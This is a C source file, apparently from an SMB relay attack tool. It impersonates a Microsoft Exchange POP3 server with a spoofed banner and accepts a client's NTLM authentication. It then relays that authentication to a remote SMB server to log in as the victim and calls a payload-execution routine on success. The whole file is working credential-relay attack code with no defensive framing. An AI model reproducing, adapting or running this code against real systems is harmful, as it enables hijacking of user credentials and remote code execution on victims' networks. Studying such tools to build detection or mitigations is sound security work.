00001
00002
00003
00004
00005
00006
00007
00008
00009
00010
00011
00012
00013
00014
00015 #include "pop3relay.h"
00016 #include "payload.h"
00017
00018 extern int verbose;
00019
00020 int HandleIncommingPOP3Request(RELAY *relay, char *destinationhostname, int destinationport)
00021 {
00022 char buffer[4096];
00023 char buf[4096];
00024 char buf1[4096];
00025 char buf2[4096];
00026
00027 char CurrentUserName[256];
00028 char CurrentDomain[256];
00029 char CurrentWorkstation[256];
00030 smheader *SmbPacket1, *SmbPacket2, *SmbPacket3, *NegotiateProtocol;
00031 tSmbNtlmAuthRequest *request;
00032
00033 uint16 packetlen;
00034 int i;
00035 char *p;
00036 const char WelcomeMessage[]= "+OK Microsoft Exchange Server 2003 POP3 server version 6.5.7226.0 (SmbRelay) ready\r\n";
00037 #define ERRORR "-ERR The specified authentication package is not supported.\r\n"
00038 #define CAPA "+OK Capability list follows\r\nAUTH NTLM\r\n+OK\r\n"
00039 #define AUTH "+OK The operation completed successfully.\r\nNTLM\r\n.\r\n"
00040 #define AUTHOK "+OK User successfully logged on.\r\n"
00041 #define AUTHERROR "-ERR Authentication Failed\r\n"
00042
00043
00044 printf("[+] Sending POP3 Banner\n");
00045 i=SendBytesAndWaitForResponse(relay->source,(char*)WelcomeMessage, (int)strlen(WelcomeMessage), buffer,sizeof(buffer),SMBWAITTIMEOUT);
00046 if (i<=0){
00047 printf("Error Reading EHLO message\n");
00048 return(0);
00049 }
00050
00051
00052 if (memcmp(buffer,"CAPA",4)==0) {
00053 printf("[+] CAPA Requests\n");
00054 i=SendBytesAndWaitForResponse(relay->source,(char*)CAPA, strlen(CAPA), buffer,sizeof(buffer),SMBWAITTIMEOUT);
00055 if (i<=0) return(0);
00056 buffer[i]='\0';
00057 }
00058 if (memcmp(buffer,"AUTH",4)!=0) {
00059 printf("[-] AUTH NTLM packet not received from client\n");
00060 i=SendBytesAndWaitForResponse(relay->source,(char*)ERRORR, strlen(ERRORR), buffer,sizeof(buffer),SMBWAITTIMEOUT);
00061 return(0);
00062 } else {
00063 printf("[+] Sending AUTH NTLM option to the client\r\n");
00064 i=SendBytesAndWaitForResponse(relay->source,(char*)AUTH, strlen(AUTH), buffer,sizeof(buffer),SMBWAITTIMEOUT);
00065 if (i<=0) return(0);
00066 buffer[i]='\0';
00067 }
00068
00069 if (memcmp(buffer,"AUTH NTLM",9)!=0) {
00070 printf("[-] Not supported option %s received\n",buffer);
00071 return(0);
00072 }
00073 if (strlen(buffer)>12){
00074 printf("[+] received AUTH NTLM message\n");
00075 memset((char*)&buf1,'\0',sizeof(buf1));
00076 packetlen=from64tobits(buf1, buffer+12);
00077 request=(tSmbNtlmAuthRequest *)buf1;
00078 dumpAuthRequest(0,request);
00079 } else {
00080 memset(buffer,'\0',sizeof(buffer));
00081 i=SendBytesAndWaitForResponse(relay->source,(char*)"+ OK\r\n", 6, buffer,sizeof(buffer),SMBWAITTIMEOUT);
00082 if (i<=0){
00083 printf("[-] Error Auth response with NTLM type1 packet\n");
00084 return(0);
00085 }
00086 buffer[i]='\0';
00087 printf("[+] received AUTH NTLM message\n");
00088 memset((char*)&buf1,'\0',sizeof(buf1));
00089 packetlen=from64tobits(buf1, buffer);
00090 request=(tSmbNtlmAuthRequest *)buf1;
00091
00092 if (debug) {
00093 printf("[+] received AUTH NTLM message: %s\n",buffer);
00094 DumpMem(buf1,packetlen);
00095 dumpAuthRequest(0,request);
00096 }
00097 }
00098
00099
00100
00101 i=ConnectToRemoteHost(relay,destinationhostname,destinationport);
00102 if (!i) {
00103 printf("[-] Unable to connect to remote host %s:%i\n",destinationhostname,destinationport);
00104 return(0);
00105 }
00106 printf("[+] Sending SMB Protocol Authentication Handshake\n");
00107 p = AddDialect(NULL,"PC NETWORK PROGRAM 1.0",0x02, &i);
00108 p = AddDialect(p,"LANMAN1.0", 0x02,&i);
00109 p = AddDialect(p,"Windows for Workgroups 3.1a", 0x02,&i);
00110 p = AddDialect(p,"LM1.2X002", 0x02,&i);
00111 p = AddDialect(p,"LANMAN2.1", 0x02,&i);
00112 p = AddDialect(p,"NT LM 0.12", 0x02,&i);
00113 NegotiateProtocol=BuildSmbPacket(NULL,NEGOTIATEPROTOCOLREQUEST,0,p,i);
00114 free(p);
00115 i=SendBytesAndWaitForResponse(relay->destination,(char*)NegotiateProtocol,SmbPacketLen(NegotiateProtocol),(char*)buf,sizeof(buf),SMBWAITTIMEOUT);
00116 free(NegotiateProtocol);
00117 if (i<=0){
00118 printf("[-] Initial SMBHandShake (LanManager Negotiation) Failed\n");
00119 return(0);
00120 }
00121
00122 SmbPacket1=BuildSmbPacket1();
00123 if (debug) {
00124 printf("\n[+] Dumping SMB Packet With NTLM Message Type 1\n");
00125 DumpMem((char*)SmbPacket1,SmbPacketLen(SmbPacket1));
00126 }
00127
00128 SmbPacket2=GetSmbPacket2(relay,SmbPacket1);
00129 if (SmbPacket2==NULL) {
00130 printf("[-] Unable to receive SMB Packet with NTLM Message Type 2\n");
00131 return(0);
00132 }
00133 printf("[+] Received SMB Message with NTLM message type 2 packet\n");
00134 memcpy((char*)&packetlen,GetNTLMPacketFromSmbPacket(SmbPacket2)-4,2);
00135
00136 if (debug) {
00137 printf("[*] SMB Packet Dump:\n");
00138 DumpMem((char*)SmbPacket2,SmbPacketLen(SmbPacket2));
00139 printf("[*] NTLM Challenge packet from SMB message\n");
00140 DumpMem((char*)GetNTLMPacketFromSmbPacket(SmbPacket2),packetlen);
00141 dumpAuthChallenge(0,(tSmbNtlmAuthChallenge*)GetNTLMPacketFromSmbPacket(SmbPacket2));
00142 }
00143
00144 ((tSmbNtlmAuthChallenge*)GetNTLMPacketFromSmbPacket(SmbPacket2))->flags=0xb207;
00145 memset(buf1,'\0',sizeof(buf1));
00146 to64frombits((unsigned char*)&buf1, (unsigned char*)GetNTLMPacketFromSmbPacket(SmbPacket2), packetlen);
00147 sprintf(buf,"+ %s\r\n",buf1);
00148
00149 printf("[+] Replaying NTLM Challenge from SMB Server to the POP3 Client\n");
00150 if (debug)
00151 {
00152 printf("[+] Sending SMTP Response: %s\n",buf);
00153 }
00154 i=SendBytesAndWaitForResponse(relay->source,(char*)buf,(int)strlen(buf),(char*)buffer,sizeof(buffer),SMBWAITTIMEOUT);
00155 if (i<=0)
00156 {
00157 printf("[-] Unable to read NTLM packet 3 from POP3 client\n");
00158 return(0);
00159 }
00160 buffer[i]='\0';
00161
00162 if (debug) printf("[*] Response: %s\n",buffer);
00163 memset((char*)&buf1,'\0',sizeof(buf1));
00164 packetlen=from64tobits(buf1, buffer);
00165 if (debug) {
00166
00167 printf("[*] Raw authorization packet (len: %i)\n",packetlen);
00168 DumpMem(buf1,packetlen);
00169 dumpAuthResponse(0,(tSmbNtlmAuthResponse*)buf1);
00170 }
00171
00172
00173 GetNTLMPacketInfo((tSmbNtlmAuthResponse*)buf1,(char*)&CurrentUserName, (char*)&CurrentDomain, (char*)&CurrentWorkstation,verbose);
00174 printf("[+] Trying to authenticate to remote SMB as %s\n",CurrentUserName);
00175 buildAuthResponse((tSmbNtlmAuthChallenge*)GetNTLMPacketFromSmbPacket(SmbPacket2),(tSmbNtlmAuthResponse*)buf2,0,CurrentUserName,NULL,NULL,CurrentWorkstation, (tSmbNtlmAuthResponse*)buf1);
00176 SmbPacket3=BuildSmbPacket((smheader*)SmbPacket2,SESSIONSETUPANDX,0,buf2,(int)SmbLength((tSmbNtlmAuthResponse *)buf2));
00177
00178
00179 printf("[+] Sending Final SMB Authentication packet with NTLM Message type 3\n");
00180 if (debug)
00181 {
00182 DumpMem((char*)SmbPacket3, SmbPacketLen(SmbPacket3));
00183 }
00184
00185 i=SendBytesAndWaitForResponse(relay->destination,(char*)SmbPacket3, SmbPacketLen(SmbPacket3),(char*)buf,sizeof(buf),SMBWAITTIMEOUT);
00186 if (i<=0){
00187 printf("[-] Error reading Server Authentication Response\n");
00188 i=SendBytesAndWaitForResponse(relay->source,AUTHERROR, strlen(AUTHERROR), buffer,sizeof(buffer),SMBWAITTIMEOUT);
00189 return(0);
00190 }
00191 if (debug) {
00192 printf("[*] SessionSetupAndX Completed - Dumping received packet\n");
00193 DumpMem(buf,i);
00194 }
00195
00196 if (((smheader*)buf)->NtStatus!=0x00000000) {
00197 printf("[-] SessionSetupAndX Completed\n[-] Authentication against Remote Host Failed\n");
00198 i=SendBytesAndWaitForResponse(relay->source,AUTHOK, strlen(AUTHERROR), buffer,sizeof(buffer),SMBWAITTIMEOUT);
00199 return(0);
00200 }
00201 if ( ((SessionSetupAndXResponse*)((smheader*)buf)->buffer)->Action & 0x0001 )
00202 {
00203 printf("[-] Authentication against Remote Host Failed. (Connected as Guest)\n");
00204 i=SendBytesAndWaitForResponse(relay->source,AUTHERROR, strlen(AUTHERROR), buffer,sizeof(buffer),SMBWAITTIMEOUT);
00205
00206 return(0);
00207 }
00208
00209
00210
00211 printf("[+] SessionSetupAndX Completed \n");
00212 printf("[+] Authenticacion against %s Succeed with username %s\n",destinationhostname,CurrentUserName);
00213 i=SendBytesAndWaitForResponse(relay->source,AUTHOK, strlen(AUTHOK), buffer,sizeof(buffer),SMBWAITTIMEOUT);
00214 ExecuteCode( *relay);
00215
00216 return(1);
00217
00218 }
00219
00220